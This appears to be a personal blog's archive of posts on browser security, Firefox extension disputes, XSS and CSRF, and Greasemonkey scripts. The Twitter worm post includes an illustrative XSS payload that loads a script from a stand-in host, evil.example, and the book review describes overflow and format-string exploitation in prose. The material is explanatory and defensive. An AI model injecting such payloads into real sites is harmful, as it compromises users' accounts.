
Changes and Future Directions

Sometimes I need to take a break from my usual posts to consider changes to make to this blog. I have tried to keep myself busy by finishing a good, informative post here at least once every two weeks. However, I also believe that new entries should be posted only when I have something interesting to write about. I do have a few half-finished drafts that may be completed and posted later, but I am not sure what kind of work I should take on next. This blog has always been primarily about the software-related work that I do, and since I am considering changing the focus of that work, this blog may change as well.

As I stated when I first started this blog, I may not be able to choose my side projects; instead, these projects seem to choose me. While I will continue to update and maintain the software I have written, I have been considering other work. As that work may take some time, I may need to spend less time writing about it, and readers may find longer waits between new posts. I may post the occasional update about what I am doing, though only when that information seems likely to interest those who read what I write. In any case, I will continue working on this blog, as I have enjoyed working on it.

A Review of the Third Chapter of the Second Edition of “Hacking: The Art of Exploitation”

After writing a review of the first two chapters of the second edition of “Hacking: The Art of Exploitation” by Jon Erickson, I planned to review the third chapter as well. Having now finished that chapter, which covers program exploitation, I present my review of it here. In my review of the first two chapters, I mentioned that the second chapter alone was worth the price of the book. In this review, I explain how the third chapter is every bit as good as the one that preceded it.

When programmers first learn to program, they tend to focus on simply making their programs appear to run properly. Once inexperienced programmers find that their programs appear to be free of errors, they may think no further work is needed. However, programs that seem to run correctly may have flaws that lead to unintended consequences. Those who teach programming sometimes make the mistake of emphasizing only the typical cases in which programs are meant to work. The book’s chapter on programming puts much emphasis on going beyond viewing programs as a series of statements written in a high-level language to accomplish certain tasks, and the reasons for this become quite evident in the chapter on program exploitation.

This third chapter covers methods of taking advantage of programming practices that should be avoided. It is divided into sections explaining concepts such as buffer overflows and format string vulnerabilities, and those sections are divided into subsections containing examples that illustrate how these vulnerabilities can be exploited. The examples progressively increase in complexity, efficiency, and effectiveness. In the section on stack-based buffer overflows, for instance, one example demonstrates how overflowing a buffer can affect what is stored in other variables. Another illustrates the possible unintended consequence of overflowing a buffer adjacent to a variable that stores whether or not access is to be granted; the author admits this situation is contrived, as whether it occurs depends on where variables are located in memory. The chapter then demonstrates how the GNU debugger can be used to find the return address to which the program will be directed, and how that address can be overwritten with an arbitrary address when the program has a buffer overflow vulnerability. An assembler dump is given to show which memory addresses a program can be pointed at, after which it is shown how memory can be overwritten with shell-spawning instructions, and how storing shellcode in environment variables can make such attacks more efficient.

After short sections on heap-based buffer overflows and the overflowing of function pointers, format string vulnerabilities are explained. This section demonstrates how code that appears to do what it is supposed to do can have very serious problems. It is first shown how memory in the current stack frame, and then in arbitrary locations, can be viewed when format parameters are missing from printf function calls. Techniques for writing to memory addresses through direct parameter access and short writes are then given, and it is once again shown how overwriting memory can lead to shellcode being run, using methods similar to those in the section on buffer overflows. It is also demonstrated how entries in the .dtors section and the global offset table can be overwritten so that shellcode is executed.

The author does well in explaining concepts by giving examples of basic attacks first, then demonstrating how more complex attacks build on the concepts previously explained. Some concepts are not explained clearly, but when a code example or idea does not quite seem clear, readers can perform their own experiments by modifying the source code on the CD that comes with the book. As I experimented with the source code, I wondered whether the book should have included exercises for the reader to complete, as a textbook would. However, the readers for whom the book is intended, the inquisitive individuals who truly are hackers, should be able to come up with their own exercises to reinforce the material. Astute readers will also try to predict upcoming material as they see how the book’s concepts fit together. For example, when .dtors and the global offset table are covered, one can predict how the addresses to which a program’s execution jumps might be overwritten with the addresses of environment variables that contain shellcode.

This chapter was very informative in explaining and demonstrating how these exploits work. I liked how simple concepts were explained first, with more complex ones built on top of them. Perhaps some of the material could have been explained better, but there is no substitute for the practical experience one can gain by working through the many examples provided in the book and on the CD that comes with it. Explanations are given mostly in the lucid and detailed manner that I have come to expect when reading this book. I look forward to reading the next chapter, which covers networking, and to reviewing it.

Adblock Plus vs. NoScript: Inside the Dispute Between Two of the Best-Known Firefox Extensions

Whenever there is a dispute between two parties, discovering all of the important facts can be difficult. There are two sides to every story, and those on one side may accuse those on the other of not being entirely honest about the facts; ironically, both sides tend to be telling the truth when they make that accusation. When a dispute arose between two of the best-known Firefox extensions, NoScript and Adblock Plus, the difficulty of determining what actually happened must have been evident even to those who had not followed it closely. In this entry, I give the relevant facts about this dispute, and I try to be as impartial as possible in doing so.

As those familiar with Adblock Plus (often abbreviated as ABP) know, it blocks web page content using sets of filters. JavaScript files, Flash animations, and groups of image files are examples of what these filters can block: any content matching certain patterns in a page’s source can be filtered out. Because end users prefer to have content filtered for them automatically, they can subscribe to filter lists, which are maintained and updated by individuals who look for content that users may want blocked. These lists are modified over time, and subscribers receive the updates periodically, trusting the maintainers to block the content they would want blocked.
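To give an idea of what these filters look like, here is a small illustrative fragment in Adblock Plus’s filter syntax. The domains are placeholders of my own, not rules from EasyList:

```
! Comments in ABP filter lists begin with an exclamation mark.
! Block any request whose address contains this URL fragment:
http://ads.example.com/banner.js
! Hide page elements matching a CSS selector, on one site only:
example.com##.sponsored-box
! Exception rule: never block requests matching this pattern:
@@http://trusted.example.net/
```

Subscribing to a list like EasyList simply means receiving a large, regularly updated file of rules in this format.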

NoScript is a Firefox extension that blocks much web page content by default. Its development is funded by user donations and by advertising on websites run by NoScript creator Giorgio Maone. Those subscribed to an ABP filter list known as EasyList may have found that some of the content on Maone’s sites, including those ads, had been blocked. Maone responded by updating the pages on his websites so that the ads could again be viewed by EasyList subscribers, and the filters were then updated so that the ads would be blocked again. To Maone, it seemed as though the site content that helps fund the development of NoScript was being deliberately targeted by the EasyList filters. In fact, according to Maone, filter rules were added that would even prevent NoScript itself from being downloaded from those websites. This led to a response from Maone that was highly controversial, and one that he would understandably come to regret very much.

Firefox extensions are not “sandboxed” in the browser, meaning that nothing prevents them from interfering with each other, and Maone took advantage of this fact. NoScript was modified so that it would alter ABP’s filter settings, whitelisting the four websites that were targeted. This interference with another extension was done rather surreptitiously: while information about it was added to the release notes of the NoScript version that performed the action, few users were likely to have read them, and Maone later admitted that he should have done more to inform users. One extension interfering with the operation of another, without explicitly asking for user consent, was considered a very questionable action on his part.

Some may want to read the official statements on this conflict that were written by the authors of these extensions. ABP creator Wladimir Palant’s comments about this issue can be found in this blog post. Maone’s response can be read here.

It was only in the last entry I wrote here, two weeks ago, that I mentioned how NoScript could be used to defend against XSS attacks. Many considered NoScript a trusted extension, perhaps one of the most trusted Firefox extensions in existence. In fact, all Firefox extensions can be considered trusted after they are reviewed and approved by staff members at addons.mozilla.org, a website often referred to simply as AMO; all extensions uploaded there are considered “experimental” until their code is reviewed. In theory, the trust that users place in non-experimental extensions could be betrayed by someone whose extension gets approved, only to be modified later to surreptitiously perform actions its users would not want. One would certainly not expect an extension written by someone seemingly motivated to prevent websites from doing anything without user consent to be such an extension. However, this is what happened, and it is the reason for the recent backlash against NoScript and for its creator’s apologies. If anything good can come from this dispute, it is that it could lead to the sandboxing of extensions within the Firefox web browser.

There are those, however, who would say that Palant should also admit to wrongdoing. When users install Adblock Plus, it is with the expectation that it will remove advertising considered intrusive. Viewing the four sites run by Maone, one can see that the advertising there is unlikely to be the reason ad blocking software exists. The targeting of Maone’s sites, which Palant admitted to, seemed questionable. There should have been more communication between the two sides of this dispute; there had to have been a way to avoid the cycle of filter updates followed by evasion of those filters.

Both Maone and Palant have faced backlash from many users. Maone, however, has admitted to wrongdoing and has removed the code that was the reason for his apologies, and after checking the EasyList filter list, the filters he mentioned no longer seem to be there. I believe that the individuals on both sides could have done better in trying to prevent this dispute. Those who write Firefox extensions seem motivated simply by making Firefox a better browser, so one would not expect such disputes among them as they work toward that common goal. It seemed as if Maone and Palant had lost their focus, and they are now not as trusted as they once were. Over time, however, I believe we may be able to trust these individuals and their extensions again. In any case, I hope not to have to write about a conflict between Firefox extension developers again.

The Twitter XSS Worm and Lessons That Can Be Learned From It

In the last entry that I wrote here, I mentioned the XSS worm that affected Twitter. In this entry, I describe this worm in greater detail. In addition, I explain what can be done by end users so that they can avoid being victims of attacks such as these.

This worm infected the profiles of Twitter users with malicious code. When a logged-in Twitter user viewed an infected profile, the JavaScript injected into that profile via an XSS hole would execute and infect the viewer’s own profile with the same code. Propagation of this worm therefore occurred through logged-in users simply viewing infected profiles. The source code used by this worm can be viewed here; as one can see, the script called from infected Twitter pages injects the malicious script, along with other data that appears in profiles infected with the worm. Damon Cortesi gives a good analysis of the worm here.
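The propagation mechanism can be modelled abstractly. The sketch below is a simplified simulation, not the worm’s actual code: the payload string and the profile contents are invented for illustration.

```javascript
// Simplified model of XSS-worm propagation (illustrative only).
// An "infected" profile contains a payload string that, when rendered
// unescaped by the site, would run in the viewer's browser and copy
// itself into the viewer's own profile.
const PAYLOAD = '<script src="http://evil.example/worm.js"></script>'; // hypothetical

function isInfected(profile) {
  return profile.includes(PAYLOAD);
}

// Models what happens when a logged-in user views a profile: if the
// viewed profile is infected, the injected script rewrites the viewer's
// profile so that it carries the payload too.
function viewProfile(viewerProfile, viewedProfile) {
  if (isInfected(viewedProfile) && !isInfected(viewerProfile)) {
    return viewerProfile + PAYLOAD; // the viewer is now a carrier
  }
  return viewerProfile; // nothing happens
}

// A short propagation chain: Alice views Mallory's infected profile,
// then Bob views Alice's profile and is infected in turn.
let mallory = 'About me!' + PAYLOAD;
let alice = 'Hi, I am Alice.';
let bob = 'Bob here.';

alice = viewProfile(alice, mallory);
bob = viewProfile(bob, alice);
```

The key point the model captures is that no one needs to click anything malicious: merely rendering an infected page is enough to spread the code.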

A number of variations of this worm have affected Twitter. The source code used by one such variation can be viewed here; comparing it with the original worm’s source code, one can see that a fairly straightforward code obfuscation technique was used to disguise it. Another variation, whose source code can be viewed here, is a modified yet non-obfuscated version of the original. As Giorgio Maone observed, those trying to correct the issue appeared to be defending against specific code that had been used, rather than against the type of attack. A few days later, Lynne Pope noted that with variations of the worm continuing to affect Twitter, the XSS hole there did not appear to be closed. Twitter seems to be targeting individual attacks rather than closing the hole that lets them through, and when a website does not do enough to prevent attacks like these, users need to know what they can do to protect themselves.
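The point about defending against specific code rather than the type of attack can be made concrete with a sketch. Both functions below are my own illustrations, not Twitter’s actual code: a blacklist that removes one known payload string misses a trivially altered variant, while escaping output neutralizes every variant at once.

```javascript
// A "fix" that targets one known attack string (brittle by design).
function blacklistFilter(input) {
  return input.replace('<script src="http://evil.example/worm.js">', '');
}

// The general fix: escape HTML metacharacters before echoing user input,
// so no submitted text can ever form a live tag.
function escapeHtml(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

const original = '<script src="http://evil.example/worm.js"></script>';
const variant  = '<SCRIPT SRC="http://evil.example/worm.js"></SCRIPT>'; // same attack, different case

const filteredOriginal = blacklistFilter(original); // known string removed
const filteredVariant  = blacklistFilter(variant);  // variant passes through untouched
const escapedVariant   = escapeHtml(variant);       // no '<' survives at all
```

Chasing each new variant with a new blacklist entry is exactly the losing game described above; output encoding closes the hole itself.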

Some Twitter users may not have been affected by this worm even after viewing infected pages on Twitter; users of the Firefox extension NoScript may be among them. Looking through the source code used by the worm and its variations, one can see that code hosted on a remote site is executed in order to make the worm propagate, which could itself be considered a reason for using NoScript. NoScript author Giorgio Maone took the opportunity to point out that because NoScript users would have been very unlikely to allow scripts from the sites where the malicious JavaScript was hosted, they may not have been affected by this worm. In addition, Lynne Pope gives an excellent list of suggestions on what users can do to prevent anything like this from happening to them. Not surprisingly, she suggests using NoScript. She also recommends not being logged into one site while logged into another; while this would certainly prevent CSRF attacks, some might consider it excessively inconvenient. She offers another criticism of Twitter as well, saying that it should have given users the information mentioned in her blog post.

I understand that much has already been said about this worm. However, the more that is said, the more likely users are to know how to keep themselves from being victims of this type of attack. Also, according to this article, those who used Google to find information on the worm may have been led to malicious websites in doing so. I may have given this information later than I should have; however, I have always considered it important for entries on this blog to be as well-written as possible, even at the expense of being up-to-date. If I wanted to write entries that were as up-to-date as possible, I would have a Twitter account. And I would be sure to use NoScript when using that Twitter account.

Do Not Remember Me: A Greasemonkey Script for Those Who Do Not Want to Be “Remembered” by Websites

It seems that nearly every website with a login form includes an option for having the site “remember” the user. Some users find this convenient, as being remembered means entering usernames and passwords less often. However, there are disadvantages to being remembered by sites. Users who share their computers with others may want to ensure that a feature that could allow those others access to their accounts is never selected. In addition, cross-site request forgery (CSRF) attacks depend on users being logged into sites, as several Twitter users discovered recently, so use of a “remember me” feature can increase the probability of becoming a victim of a CSRF attack.

Despite these facts, some websites have the option to be remembered selected by default. Some users may want to make it less likely that others will access their accounts by ensuring that this option is never selected, and deselecting it each time they log into a site can be a nuisance. For these reasons, I decided to write a Greasemonkey script that removes the checkmarks from checkboxes that indicate the user wants to be remembered by a website.

This script, which I titled “Do Not Remember Me,” looks for checkboxes on web pages and determines whether they are for remembering users by checking nearby page material. By default, it is set to work with all websites; however, since some users may want to be remembered by certain sites, users may want to configure the script so that it is not applied to those sites.
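The detection heuristic described above can be sketched as a pure function. The wording patterns below are my own invention, not the script’s actual rules, but they show the general idea of classifying a checkbox by the text near it:

```javascript
// Given the text near a checkbox, decide whether it is a "remember me"
// checkbox (to be unchecked) or a "public terminal" checkbox (to be
// checked). The patterns are illustrative; the real script may differ.
function classifyCheckbox(nearbyText) {
  const text = nearbyText.toLowerCase();
  if (/public (terminal|computer)/.test(text)) {
    return 'check';   // shared machine: opt out of persistent login
  }
  if (/remember me|keep me (logged|signed) in|stay signed in/.test(text)) {
    return 'uncheck'; // persistent-login option: deselect it
  }
  return 'ignore';    // unrelated checkbox: leave it alone
}

// In a Greasemonkey script, this decision would drive DOM updates:
// for each input[type=checkbox], read the adjacent label text and set
// checkbox.checked according to the classification.
```

This is also why such scripts can misfire on some sites: the heuristic only sees nearby text, so unusual wording can slip past it.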

This script, like other Greasemonkey scripts made to work with all websites, might not actually work with all of them; some users may find errors that cause it to fail on certain sites. However, I have found that it does work with the websites that made me want to write it. Those who often log into userscripts.org, the website where this and many other Greasemonkey scripts can be found, may want to use this script: as you can see from that site’s login page, the option to be remembered is selected at first, and I did not want to keep removing that checkmark myself. The script also works with the login page on Google Accounts, which remembers its users by default, and I have found that it works with Hotmail’s login page as well. I also set it up so that it would actually add checkmarks to checkboxes that say “public terminal” beside them, as one can see by viewing Slashdot with the script enabled. In addition to making it work with as many sites as possible, I have tried to make it as efficient as possible. It may not yet be as efficient as it could and should be, but I chose to release it as it is so that others could critique it.

I could make this post less boring by mentioning a few more interesting facts about the script. I originally planned to call it “Don’t Remember Me”; however, it might then have been referred to as “DRM,” an acronym many associate with Digital Rights Management. I wanted to avoid this acronym collision, even though I never thought the script would be listed on Wikipedia’s disambiguation page for DRM. Those who look through the code may not find it entertaining, either: I thought of writing that the purpose of one function was to “check checkboxes to check if they should be unchecked,” but eventually chose clarity over comedy in my comments.

If you have Greasemonkey installed, you can install this script by clicking here. As always, I would be pleased to answer any questions about it. I could go into greater detail about the implementation, although I am rarely asked about the implementation details of what I write. I will say that I have also considered writing a very similar script titled “Do Not Remember My Passwords,” which, as you may have surmised, would deselect checkboxes indicating that passwords are to be remembered. I considered combining the two into one script titled “Do Not Remember Me and Do Not Remember My Passwords Either,” but thought it best to keep them separate. What I do next with this script and any related ones may depend on the suggestions I receive.

One Programmer’s View of How Programmers View Resumes

I try not to bore those who read what I write, so I consider it at least somewhat important to make the material here at least somewhat entertaining. For that reason, I wanted to write a post that would be considered humorous, and I had some difficulty finding humorous material to write about. That is, until I came across an amusing blog post.

I discovered the post in question at a time when I was unsure what to write about next, in one of those serendipitous moments that sometimes occur. I was testing a Greasemonkey user script with sites that have login forms, and it was while testing that script with the login form on Reddit that I came across a link to a comic on how programmers read resumes, which was part of that blog post.

In that blog post, the comic preceded what its author referred to as “real tips,” in the form of links to articles elsewhere on the web. While the post may have been intended to be comical, the humour in it must have been based on the author’s opinions, and from what I was able to glean from his website, he is a programmer who has been involved in hiring programmers. Perhaps what he noted was based on his experience working with other programmers. He, like some other programmers, may be biased toward candidates who have e-mail addresses at their own domains and who compile their resumes using LaTeX. There may be those who lose interest in candidates who list Visual Basic first among the programming languages they know. And I can certainly understand why programmers would prefer to hire those who write their own compilers or operating systems.

I cannot be certain how accurate that comic is; its accuracy, or lack thereof, is debatable. However, many found it humorous, and it is the kind of material I would occasionally like to have here. I would like to find a way to make my own material that amusing. Until I do, perhaps I will work on writing a compiler or an operating system.

The Importance of NoScript’s Surrogate Scripts

The tradeoff between security and convenience is one that users often face when browsing the web. Those who prefer security at the expense of convenience may use the Firefox extension called NoScript, whose very name emphasizes the measures it takes to secure the browser. Some would say those measures are excessive, as NoScript blocks all scripts that are not whitelisted. Much web page content is blocked until whitelisted, and that can be quite inconvenient, as users of my Greasemonkey script that works with embedded YouTube videos have noted on a few occasions. Some pages may not function correctly at all when sites such as google-analytics.com are blocked by NoScript. Because users do not want to choose between allowing all scripts that a page uses and not having the page function correctly, an attempt at solving this issue is implemented in the more recent versions of NoScript: they replace some blocked scripts with scripts known as surrogate scripts.

These surrogate scripts handle situations in which third-party scripts from sites such as google-analytics.com look for page content that NoScript has blocked. By replacing blocked scripts with similar, harmless ones, surrogates make pages more likely to be error-free. Some concerned “non-geeks” have asked whether these surrogate scripts send any data to third-party sites; those who have viewed and understood their source code can assure them that the scripts simply try to keep web pages from breaking. Some NoScript users had previously found that certain pages were broken unless scripts from such sites were allowed. I found that when scripts from google-analytics.com were blocked, pages on some sites appeared to be broken, but they no longer appeared broken when the corresponding surrogate script was used. I have also found that surrogate scripts cut down on the clutter in the error console, as pages produce fewer errors when they are used.
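To illustrate what a surrogate might look like, here is a minimal sketch in the spirit of a surrogate for google-analytics.com. This is not NoScript’s actual surrogate code; it simply defines no-op stand-ins for the globals the real analytics scripts would create, so page code that calls them does not throw errors when the real script is blocked:

```javascript
// Illustrative surrogate sketch: no-op replacements for the entry points
// of the classic Google Analytics scripts, so calling code cannot fail.
var urchinTracker = function () {};          // stand-in for urchin.js

var _gat = {
  _getTracker: function () {
    // Return an object whose tracking methods all do nothing.
    return {
      _trackPageview: function () {},
      _trackEvent: function () {}
    };
  }
};

// Page code like the following now runs without errors, and no data is
// ever sent anywhere ('UA-XXXXX-X' is a placeholder account id):
var pageTracker = _gat._getTracker('UA-XXXXX-X');
pageTracker._trackPageview();
urchinTracker('/home');
```

Since the stubs never make network requests, there is nothing for the surrogate to send to a third party: it exists only to satisfy the page’s expectations.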

Users of the more recent versions of NoScript may have used these surrogate scripts without even knowing it. However, some users might want an easier way to configure them. At this time, there is no user interface for configuring surrogate scripts because, as NoScript author Giorgio Maone says, those who would configure these scripts and their options would likely not need one. Still, a UI would be convenient, as adjustments to the configuration may sometimes be necessary: one might want to control which sites use surrogate scripts, or be informed when a page is using one. In fact, I decided to make a few adjustments to surrogate scripts so that they would display information right on the pages where they are used.

I wanted to know when the surrogate script for code from google-analytics.com was being used, so I added a JavaScript alert statement to it. As those familiar with JavaScript know, that statement makes a pop-up window appear whenever the script executes. I then made the code a little more elaborate, having it run after the page finishes loading and add text directly to the page to indicate that the surrogate script is in use. However, it would be preferable for information about when these scripts are used to appear in the browser UI instead.
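The kind of modification described above can be sketched as follows. The element id and notice wording are my own, and the DOM calls used are standard; this is an illustration of the approach rather than my exact code:

```javascript
// Append a visible notice to the page announcing that a surrogate
// script is active. Passing the document in makes the function easy
// to exercise outside a browser.
function announceSurrogate(doc, surrogateName) {
  var notice = doc.createElement('div');
  notice.id = 'surrogate-notice'; // illustrative id
  notice.appendChild(doc.createTextNode(
    'NoScript surrogate active: ' + surrogateName));
  doc.body.appendChild(notice);
  return notice;
}

// In a surrogate script, this would be hooked to the load event:
//   window.addEventListener('load', function () {
//     announceSurrogate(document, 'google-analytics.com');
//   }, false);
// An alert() call works too, but a pop-up on every page load is far
// more intrusive than an in-page notice.
```

Waiting for the load event matters because a surrogate may run before the page body exists, at which point there is nothing to append the notice to.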

Users of the web may always need to choose between security and convenience. The newer versions of NoScript make it so that less convenience must be sacrificed for improved security. It would still be more convenient if there were a UI for working with these surrogate scripts; however, it is good to know that choosing security over convenience when browsing the web now seems to be a less difficult decision to make.

A Defence of a Greasemonkey Script That I Never Thought I Would Defend

It was almost a year ago that I quickly wrote a Greasemonkey user script titled “Web Form Data Analyzer.” This script, which can be found here, modifies the action attributes of <form> tags so that submitted form data is redirected to a page that displays exactly what would be sent. The page receiving the data exists specifically to display it, and is part of the official reference website for the book “Webbots, Spiders, and Screen Scrapers” by Michael Schrenk. It is not a script I have often used myself, as I have rarely needed to see what data is sent via web forms, and when I first released it, I mentioned that I did not expect much interest in it. Some people have installed it nonetheless. It also received a negative review from a user on userscripts.org, which stated that there is no way to ensure that the page receiving the form data can be trusted, and that one should instead use a Firefox extension titled “Tamper Data,” as that extension can be trusted. While that extension can indeed be used to view submitted form data, there are reasons one might prefer the script I wrote.

While some may like being able to view all data sent to and from the browser, others may find that the Tamper Data extension is more than they need. Those who only want to view the data sent via web forms may want something simpler, specialized to that one task, and the Web Form Data Analyzer script is for them. In addition, the script displays the form data without ever sending it to the website for which it was intended; those who prefer to inspect what a form would submit, without actually submitting it, may therefore prefer this script.
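The core of a script like this one can be sketched in a few lines: point every form at an echo page instead of its real destination, so that submitting shows exactly what would have been sent. The echo URL below is a placeholder of my own, not the book site’s actual address:

```javascript
// Redirect every form on a page to an echo page that displays the
// submitted data. Returns the original action URLs, in case a script
// wanted to show or restore them later.
var ECHO_PAGE = 'http://example.com/show_form_data.php'; // hypothetical

function redirectForms(forms) {
  var originals = [];
  for (var i = 0; i < forms.length; i++) {
    originals.push(forms[i].action); // remember where data would have gone
    forms[i].action = ECHO_PAGE;     // send it to the echo page instead
  }
  return originals;
}

// In a Greasemonkey script this would be called as:
//   redirectForms(document.getElementsByTagName('form'));
```

Because the action attribute is rewritten before submission, the data never reaches the original site, which is exactly the property described above.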

Some may not be sure whether the page to which the script redirects form data will display that data accurately. However, the source code that this page apparently uses can be viewed here: it is simply PHP code that displays the values that would be stored in variables when form data is submitted. And if one does not believe that the page actually uses that source code, the script can be modified to redirect form data to a different page. All that is needed is a web server hosting a page with code that displays the data. Since one would likely be using Firefox when using this script, one could use an extension called Plain Old Webserver to set up such a server. Setting this up might seem like more work than it is worth, although it is a way to ensure that the data returned is accurate.

This script may be useful for those who trust the official reference website for the book titled “Webbots, Spiders, and Screen Scrapers.” Those who do not trust it may find other methods for determining what data is sent through web forms. Opinions on whether that page can be trusted may differ, and this script is for those who believe that the page it uses is reliable.

An Introduction to JavaScript Forms That Is Also an Introduction to How to Perform XSS Attacks

I sometimes take time to browse archives of reported XSS vulnerabilities to see whether any high profile websites are, or had been, vulnerable to XSS attacks. I also look at how long it takes websites to remove these vulnerabilities. High profile websites such as Google and Facebook tend to have them fixed within short periods of time. Less well-known websites tend to be left vulnerable, as you can see if you view this archive of XSS vulnerabilities. One reason this is the case is that lower profile websites are not targeted by XSS attacks as often; there is less incentive for attackers to target them. In fact, these sites that are less likely to be targeted can be vulnerable to some of the simplest XSS attacks.

After recently checking which sites were listed as having XSS vulnerabilities, I noticed a site listed there that is vulnerable to the simplest kind of XSS attack. The site contains JavaScript tutorials, along with live implementations of the JavaScript example code, and the implementation of one of these examples contains an XSS vulnerability. The example was designed to be very basic, so it is not surprising that no methods for preventing XSS attacks were included in its implementation. It implements code for submitting data through a form, and it simply displays what was submitted through that form. Therefore, if any code is submitted through the form, that code is added to the page that appears after the form data is submitted. This reported vulnerability can give a basic idea of how XSS attacks work, as it demonstrates only code injection, with no filter evasion techniques.
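The vulnerable pattern, and its fix, are both short. A hedged sketch (function names are mine, not code from the site in question): if a page concatenates submitted text directly into its HTML, a payload such as `<script>alert(1)</script>` is parsed as markup and executes; escaping the HTML metacharacters first makes the payload display as plain text instead.

```javascript
// Unsafe: submitted text is concatenated straight into the page,
// so any markup in it, including <script> tags, takes effect.
function echoUnsafe(input) {
  return "<p>You submitted: " + input + "</p>";
}

// Escape the HTML metacharacters so injected markup is rendered
// as literal text. The ampersand must be replaced first.
function escapeHtml(input) {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Safe: the same echo, with escaping applied to the user's input.
function echoSafe(input) {
  return "<p>You submitted: " + escapeHtml(input) + "</p>";
}
```

The difference between the two functions is the entire vulnerability: the tutorial page behaves like `echoUnsafe`, while any page that does not want to execute user-supplied code needs to behave like `echoSafe`.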

As of the time this post was published, nothing had been done to correct this vulnerability. That may not be because whoever wrote the PHP code that handles the submitted form data was never informed of it. More likely, XSS prevention simply matters less for this site than it would for others; for example, theft of cookies or authentication credentials is not a concern here. In any case, this page provides an example of how to perform an XSS attack against any page that simply displays whatever data a user submits.

User Feedback Still Driving the Development of My Greasemonkey Script for Embedded YouTube Videos

I have mentioned before that the software I write is written primarily for myself. However, I sometimes gradually lose interest in using my own software, and when that happens, I am less likely to discover errors in it. Those who use what I wrote therefore test my software for me simply by using it. Although these users might not consider their use of my software to be testing, a sufficiently large number of them will find errors in what I write. I would prefer to find errors before these users do, but the errors get corrected regardless of who finds them. Once again, an error was found in my Greasemonkey script that adds links below embedded YouTube videos to the pages on YouTube where those videos can be found. And once again, the discovery was made by a user of the script.

What was discovered may not be considered a bug, as not displaying links below embedded videos that are no longer available on YouTube might be considered expected behavior for this script. However, when I found the time to look into this, I found that the script would still add links below unavailable videos when the option to display video titles was not selected. The script was handling this case inconsistently, so I needed to find a more appropriate way to handle it.

I decided to update the script so that it always adds links below embedded YouTube videos, even when those videos are no longer available on YouTube. In that case, it also adds a note saying that the title of the video is not available. That note is not displayed when the option to display titles is not selected. I think this is an appropriate way to handle the situation, although some might prefer that information on whether or not a video is available always be included in the links added by the script.
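The decision described above can be sketched as a small function. This is an illustration of the logic, not the script's actual code; the function and parameter names are my own.

```javascript
// Build the text of the link added below an embedded video.
// videoId:    the YouTube video ID from the embed.
// title:      the video's title, or null if the video is no
//             longer available on YouTube.
// showTitles: the user's "display video titles" option.
function buildLinkText(videoId, title, showTitles) {
  var watchUrl = "http://www.youtube.com/watch?v=" + videoId;
  if (!showTitles) {
    // Titles are off: just link to the watch page, and say
    // nothing about availability.
    return watchUrl;
  }
  // Titles are on: show the title, or note that it is unavailable.
  return title !== null
    ? title
    : "(title not available) " + watchUrl;
}
```

Structuring the logic this way makes the two options consistent: a link is always produced, and the availability note appears only when titles are being displayed.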

If any users have ideas on better ways to handle this situation, I would like to hear them. Once again, suggestions from end users will likely be implemented.